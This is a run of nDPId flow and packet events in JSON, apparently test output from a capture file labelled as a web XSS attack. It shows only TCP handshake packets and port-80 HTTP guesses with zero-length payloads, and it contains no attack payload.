-00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":391,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347627616,"flow_last_seen":1499347632792,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59220,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":392,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347630130,"flow_last_seen":1499347635793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59246,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":393,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347631388,"flow_last_seen":1499347636793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59260,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6542,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":394,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347632635,"flow_last_seen":1499347637795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347751041,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59274,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347752308,"flow_last_seen":1499347752308,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347752308,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60558,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6545,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":1,"flow_last_seen":1499347752308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347752308,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8qStAAD4GHKWsEAABwKgKMuyOAFBMoE8CAAAAAKACchDvHQAAAgQFtAQCCAoBO+YpAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6546,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":2,"flow_last_seen":1499347752308,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347752308,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7I5f6lZGTKBPA6AScSB+SAAAAgQFtAQCCAoD5beeATvmKQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6547,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":463,"flow_packet_id":3,"flow_last_seen":1499347752309,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347752309,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0qSxAAD4GHKysEAABwKgKMuyOAFBMoE8DX+pWR4AQAOUdTwAAAQEICgE75ioD5bee"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347753649,"flow_last_seen":1499347753649,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347753649,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60572,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6557,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":1,"flow_last_seen":1499347753649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347753649,"pkt":"ABm5CmnxAMGxFOsxCABFAAA825ZAAD4G6jmsEAABwKgKMuycAFCJVjzvAAAAAKACchDDHAAAAgQFtAQCCAoBO+d5AAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6558,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":2,"flow_last_seen":1499347753649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347753649,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Jyb\/4pAiVY88KAScSDg6AAAAgQFtAQCCAoD5bjtATvneQEDAwc="} -00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6559,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":464,"flow_packet_id":3,"flow_last_seen":1499347753650,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347753650,"pkt":"ABm5CmnxAMGxFOsxCABFAAA025dAAD4G6kCsEAABwKgKMuycAFCJVjzwm\/+KQYAQAOV\/8AAAAQEICgE753kD5bjt"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347756244,"flow_last_seen":1499347756244,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347756244,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60598,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6578,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":1,"flow_last_seen":1499347756244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347756244,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8sh5AAD4GE7KsEAABwKgKMuy2AFCIyFgfAAAAAKACchCl2AAAAgQFtAQCCAoBO+oBAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6579,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":2,"flow_last_seen":1499347756244,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347756244,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Lb17AxJiMhYIKAScSDlJQAAAgQFtAQCCAoD5bt2ATvqAQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6580,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":465,"flow_packet_id":3,"flow_last_seen":1499347756245,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347756245,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0sh9AAD4GE7msEAABwKgKMuy2AFCIyFgg9ewMSoAQAOWELAAAAQEICgE76gID5bt2"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347757502,"flow_last_seen":1499347757502,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347757502,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60612,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6587,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":1,"flow_last_seen":1499347757502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347757502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8UWhAAD4GdGisEAABwKgKMuzEAFA\/lLpUAAAAAKACchCLjgAAAgQFtAQCCAoBO+s8AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6588,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":2,"flow_last_seen":1499347757502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347757502,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7MQtkPNXP5S6VaAScSCq7wAAAgQFtAQCCAoD5bywATvrPAEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6589,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":466,"flow_packet_id":3,"flow_last_seen":1499347757502,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347757502,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0UWlAAD4GdG+sEAABwKgKMuzEAFA\/lLpVLZDzWIAQAOVJ9wAAAQEICgE76zwD5byw"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347758774,"flow_last_seen":1499347758774,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347758774,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60626,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6599,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":1,"flow_last_seen":1499347758774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347758774,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83kZAAD4G54msEAABwKgKMuzSAFAZPzI8AAAAAKACchA4sAAAAgQFtAQCCAoBO+x6AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6600,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":2,"flow_last_seen":1499347758774,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347758774,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7NL2+p6BGT8yPaAScSDiPQAAAgQFtAQCCAoD5b3vATvsegEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6601,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":467,"flow_packet_id":3,"flow_last_seen":1499347758775,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347758775,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03kdAAD4G55CsEAABwKgKMuzSAFAZPzI99vqegoAQAOWBRQAAAQEICgE77HoD5b3v"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347761418,"flow_last_seen":1499347761418,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761418,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60652,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6617,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":1,"flow_last_seen":1499347761418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347761418,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8apdAAD4GWzmsEAABwKgKMuzsAFC\/aIWYAAAAAKACchA8ewAAAgQFtAQCCAoBO+8PAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6618,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":2,"flow_last_seen":1499347761418,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347761418,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7OwFUgVYv2iFmaAScSBuRgAAAgQFtAQCCAoD5cCEATvvDwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6619,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":468,"flow_packet_id":3,"flow_last_seen":1499347761419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347761419,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0aphAAD4GW0CsEAABwKgKMuzsAFC\/aIWZBVIFWYAQAOUNTgAAAQEICgE77w8D5cCE"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":395,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347635154,"flow_last_seen":1499347640794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59300,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":396,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347636429,"flow_last_seen":1499347641793,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59314,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":397,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347637687,"flow_last_seen":1499347642795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59328,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":398,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347640199,"flow_last_seen":1499347645794,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59354,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":399,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347641440,"flow_last_seen":1499347646795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59368,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6626,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":400,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347642716,"flow_last_seen":1499347647795,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347761829,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59382,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347762675,"flow_last_seen":1499347762675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347762675,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60666,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6629,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":1,"flow_last_seen":1499347762675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347762675,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8U3VAAD4GclusEAABwKgKMuz6AFDBm6M8AAAAAKACchAbXAAAAgQFtAQCCAoBO\/BJAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6630,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":469,"flow_packet_id":2,"flow_last_seen":1499347762675,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347762675,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7Proa5y3wZujPaAScSDRcwAAAgQFtAQCCAoD5cG+ATvwSQEDAwc="} 